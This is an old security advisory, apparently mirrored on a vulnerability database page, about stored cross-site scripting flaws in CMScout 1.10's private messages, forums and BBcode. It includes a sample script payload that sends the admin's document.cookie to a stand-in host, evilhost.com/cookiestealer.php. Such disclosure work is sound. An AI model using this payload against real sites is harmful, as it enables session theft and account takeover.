Vulners
Lucene search
CmscoutXSS.txt
`Cmscout <= V1.10 multiple XSS attack vectors
Discovered by: Nomenumbra
Date: 5/2/2006
impact:moderate (privilege escalation,possible defacement)
CMScout is a CMS (Content management system) for scouting related groups from around the world.
A CMS is a piece of web software that makes it easy for you to install, and manage a website.
CMScout includes all the features of other major CMS's that are available (Like PHP-Nuke, Mambo, e107, etc.).
Added news items and events are properly filtered for potential XSS input, input in the forums and PM's however, is not.
For example, when one would send a pm to the admin like this:
Subject: whatever
Body: <script>window.navigate('http://www.evilhost.com/cookiestealer.php?c='+document.cookie)</script>
we could obtain the admin's cookie. The inside of BBcode isn't filtered either. This goes for the forums too.
Nomenumbra/[0x4F4C]
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 May 2006 00:00Current
7.4High risk
Vulners AI Score7.4